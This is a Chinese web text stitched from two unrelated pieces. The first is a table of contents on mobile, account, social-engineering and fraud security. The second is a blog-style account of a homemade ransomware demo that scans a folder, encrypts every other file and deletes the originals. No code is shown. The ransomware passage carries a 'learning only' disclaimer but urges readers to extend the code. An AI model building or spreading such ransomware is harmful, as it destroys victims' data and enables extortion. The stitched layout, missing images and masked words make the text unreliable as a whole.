　　16.2.2 无线路由器账号管理

　　16.2.3 扫描路由器安全隐患

　　16.3 手机WiFi使用安全

　　16.3.1 手机WiFi安全防范建议

　　16.3.2 “Wifi Protector”防护WiFi ***

　　16.3.3 手机热点安全设置

　　17.1 走近Android操作系统

　　17.1.1 Android系统简介

　　17.1.2 Android的系统特性

　　17.2 Android刷机与Root

　　17.2.1 Android系统刷机概述

　　17.2.2 Android刷机操作

　　17.2.3 Root的原理

　　17.2.4 Root操作

　　17.3 Android操作系统的安防策略

　　17.3.1 Android系统安全性问题

　　17.3.2 Android常用安全策略

　　17.3.3 Android数据备份

　　17.3.4 Android系统的加密 ***

　　17.4 常用的Android系统防御类软件

　　17.4.1 LBE安全大师

　　17.4.2 360手机卫士

　　17.4.3 腾讯手机管家

　　18.1 iOS操作系统概述

　　18.1.1 系统架构

　　18.1.2 iOS的系统特性

　　18.2 iOS数据备份

　　18.2.1 使用iCloud备份和恢复用户数据

　　18.2.2 使用iTunes备份和恢复用户数据

　　18.2.3 使用iTools备份和恢复用户数据

　　18.3 iOS系统越狱

　　18.3.1 iOS系统越狱概述

　　18.3.2 越狱的优点和缺点

　　18.4 iOS操作系统安全防护

　　18.4.1 iOS系统安全性问题

　　18.4.2 确保Apple ID安全

　　18.4.3 开启Apple ID的双重认证

　　18.4.4 iOS操作系统的其他安全措施

　　19.1 *** 安全攻防

　　19.1.1 密保工具设定

　　19.1.2 独立密码设定

　　19.1.3 *** 安全中心软件防护

　　19.2 微信安全防护

　　19.2.1 微信安全概述

　　19.2.2 冻结与解封账号

　　19.2.3 丢失密码找回

　　19.2.4 “腾讯手机管家”防护微信

　　19.3 移动支付防护

　　19.3.1 移动支付概述

　　19.3.2 “支付保镖”防护

　　20.1 走进社会工程学

　　20.1.1 社会工程学定义

　　20.1.2 社会工程学的攻击手段

　　20.1.3 社工库常用操作

　　20.2 防范社会工程学攻击

　　20.2.1 个人防范社工攻击策略

　　20.2.2 组织与企业防范社工攻击策略

　　20.2.3 防范人肉搜索

　　20.2.4 识破心理骗局── *** 谣言

　　21.1 走进电信诈骗

　　21.1.1 电信诈骗的定义

　　21.1.2 电信诈骗的特点

　　21.1.3 常见的电信诈骗手段

　　21.2 防范电信诈骗

　　21.2.1 个人防范电信诈骗策略

　　21.2.2 电信诈骗鉴定

　　21.2.3 欺诈拦截

　　21.2.4 举报电信诈骗

　　

　　防止博客图床图片失效，防止图片源站外链：

　　)

　　思维导图在线编辑链接：

　　

　　勒索病毒是把你的数据进行加密，然后把原数据删除的，具有恶意心的程序。

　　首先我们需要扫描文件，在本试验中我只进行制定目录下的扫描，然后获取到的文件进行分类，也就是判断，文件中是否含有病毒本身等，然后除了本身以外，所有文件进行加密，并删除原数据。

　　这是今天攻击的目标目录，里面的文件都是正常文件。

　　

　　原数据是正常的

　　

　　运行病毒代码 看 窗口中列出了扫描出的文件名，并且源文件都消失了，而多出来一个叫lesuo的文件 看看里面到底有啥

　　刚才的文件都跑到这来了，我们看看文件内容，是否有变化

　　

　　内容完全变了，全都变成00111100的玩意儿，厉不厉害

　　

　　***重要提示：本文内容仅为学习技术，技术一定要用在正确方面

　　我把程序很多部分功能限制了，不然我电脑文件会收到影响，自己哪去代码好好扩展，系统坏了别怪我哦！